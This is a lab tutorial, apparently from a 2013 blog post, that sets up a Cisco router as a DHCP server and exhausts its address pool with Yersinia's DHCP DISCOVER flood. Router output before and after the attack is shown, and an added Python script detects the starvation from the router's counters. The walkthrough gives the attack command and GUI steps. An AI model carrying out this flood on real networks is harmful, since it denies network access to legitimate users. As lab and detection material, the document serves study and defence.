10 June, 2013

DHCP Starvation Attack Using Yersinia

DHCP Starvation Attack



Configure Cisco Router as DHCP Server
R1(config)#ip dhcp excluded-address 192.168.1.1 192.168.1.10
R1(config)#ip dhcp pool MYPOOL
R1(dhcp-config)#default-router 192.168.1.1
R1(dhcp-config)#dns-server 192.168.1.1
R1(dhcp-config)#domain-name microsoft.com
R1(dhcp-config)#network 192.168.1.0 /24
R1(dhcp-config)#exit

Configure Interface 
R1(config)#interface fastEthernet 0/0
R1(config-if)#ip address 192.168.1.1 255.255.255.0
R1(config-if)#no shutdown

Verify Configuration 
R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address          Client-ID/              Lease expiration        Type
                    Hardware address/
                    User name
192.168.1.11        0108.0027.5351.11       Mar 02 2002 12:04 AM    Automatic
192.168.1.12        0102.004c.4f4f.50       Mar 02 2002 12:08 AM    Automatic

R1#show ip dhcp pool
Pool MYPOOL :
 Utilization mark (high/low)    : 100 / 0
 Subnet size (first/next)       : 0 / 0
 Total addresses                : 254
 Leased addresses               : 2
 Pending event                  : none
 1 subnet is currently in the pool :
 Current index        IP address range                    Leased addresses
 192.168.1.12         192.168.1.1      - 192.168.1.254     1

R1#show ip dhcp server statistics
Memory usage         24329
Address pools        1
Database agents      0
Automatic bindings   2
Manual bindings      0
Expired bindings     0
Malformed messages   0
Secure arp entries   0

Message              Received
BOOTREQUEST          0
DHCPDISCOVER         2
DHCPREQUEST          2
DHCPDECLINE          0
DHCPRELEASE          0
DHCPINFORM           2

Message              Sent
BOOTREPLY            0
DHCPOFFER            2
DHCPACK              4
DHCPNAK              0

We have only 2 DHCP clients.

Now start the DHCP discovery attack using Yersinia 0.7.1.

Verify Interface Configuration 
root@bt:~# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 08:00:27:9d:cb:38
          inet addr:192.168.1.2  Bcast:192.168.1.255  Mask:255.255.255.0
          inet6 addr: fe80::a00:27ff:fe9d:cb38/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1011 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2638752 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:153749 (153.7 KB)  TX bytes:753163338 (753.1 MB)
          Interrupt:10 Base address:0xd020

root@bt:~# yersinia -G 



This opens the graphical interface.

Click "Launch attack".

Select "DHCP" and then "Send DISCOVERY Packet".

Now check the router.

Monitor and Verify Cisco Router 
R1#debug ip dhcp server packet
*Mar  1 00:30:44.043: DHCPD: Sending DHCPOFFER to client b870.fe70.9c15 (192.168.1.64).
*Mar  1 00:30:44.047: DHCPD: broadcasting BOOTREPLY to client b870.fe70.9c15.
*Mar  1 00:30:44.087: DHCPD: DHCPDISCOVER received from client 33d7.f461.f513 on interface FastEthernet0/0.
*Mar  1 00:30:44.095: DHCPD: Allocate an address without class information (192.168.1.0)
R1#un all

R1#show ip dhcp pool
Pool MYPOOL :
 Utilization mark (high/low)    : 100 / 0
 Subnet size (first/next)       : 0 / 0
 Total addresses                : 254
 Leased addresses               : 244
 Pending event                  : none
 1 subnet is currently in the pool :
 Current index        IP address range                    Leased addresses
 0.0.0.0              192.168.1.1      - 192.168.1.254     244

R1#show ip dhcp server statistics
Memory usage         55845
Address pools        1
Database agents      0
Automatic bindings   132
Manual bindings      0
Expired bindings     124
Malformed messages   0
Secure arp entries   0

Message              Received
BOOTREQUEST          0
DHCPDISCOVER         5424
DHCPREQUEST          2
DHCPDECLINE          0
DHCPRELEASE          0
DHCPINFORM           2

Message              Sent
BOOTREPLY            0
DHCPOFFER            256
DHCPACK              4
DHCPNAK              0

R1#show ip dhcp binding
Bindings from all pools not associated with VRF:
IP address          Client-ID/              Lease expiration        Type
                    Hardware address/
                    User name
192.168.1.11        0108.0027.5351.11       Mar 02 2002 12:04 AM    Automatic
192.168.1.12        0102.004c.4f4f.50       Mar 02 2002 12:08 AM    Automatic
192.168.1.39        6909.b30f.bfae          Mar 01 2002 12:43 AM    Automatic
<Lines Omitted>
192.168.1.253       5084.9a4f.901e          Mar 01 2002 12:42 AM    Automatic
192.168.1.254       6440.0969.6d16          Mar 01 2002 12:42 AM    Automatic

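All pool addresses are used: 244 of the 254 addresses are leased, and the remaining 10 (192.168.1.1 to 192.168.1.10) are excluded from the pool.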
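
The counters above are enough to detect this condition from the server side. The following is an added example, not part of the original post: it compares two snapshots of `show ip dhcp pool` and `show ip dhcp server statistics` (values copied from the output on this page) and flags the starvation pattern. The function names and both thresholds are assumptions.

```python
import re

# Counters copied from the router output on this page (trimmed to the lines used).
BASELINE = """\
 Total addresses                : 254
 Leased addresses               : 2
Expired bindings     0
DHCPDISCOVER         2
DHCPREQUEST          2
DHCPOFFER            2
DHCPACK              4
"""
AFTER = """\
 Total addresses                : 254
 Leased addresses               : 244
Expired bindings     124
DHCPDISCOVER         5424
DHCPREQUEST          2
DHCPOFFER            256
DHCPACK              4
"""

# Matches "name : N" (show ip dhcp pool) and "name   N" (server statistics).
COUNTER = re.compile(r"^\s*([A-Za-z][A-Za-z ]*?)\s*(?::|\s{2,})\s*(\d+)\s*$")

def parse_counters(text):
    """Return {counter name: value} for every simple counter line in the output."""
    return {m.group(1): int(m.group(2))
            for m in map(COUNTER.match, text.splitlines()) if m}

def starvation_findings(before, after, pool_threshold=0.90, ratio=10):
    """Compare two snapshots; thresholds are assumed values, tune per network."""
    b, a = parse_counters(before), parse_counters(after)
    delta = {k: a[k] - b.get(k, 0) for k in a}
    findings = []
    used = a["Leased addresses"] / a["Total addresses"]
    if used >= pool_threshold:
        findings.append(f"pool {used:.0%} leased")
    # Real clients follow a DISCOVER with a REQUEST; a DISCOVER flood does not.
    if delta["DHCPDISCOVER"] > ratio * max(delta["DHCPREQUEST"], 1):
        findings.append(f"{delta['DHCPDISCOVER']} new DISCOVERs vs "
                        f"{delta['DHCPREQUEST']} new REQUESTs")
    # An OFFER that is never completed still ties up a pool address for a time.
    if delta["DHCPOFFER"] > ratio * max(delta["DHCPACK"], 1):
        findings.append(f"{delta['DHCPOFFER']} new OFFERs vs "
                        f"{delta['DHCPACK']} new ACKs")
    return findings

if __name__ == "__main__":
    for finding in starvation_findings(BASELINE, AFTER):
        print("ALERT:", finding)
```

The full output of both commands can be passed in unchanged, since lines that are not simple counters are ignored by the parser.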

Done!
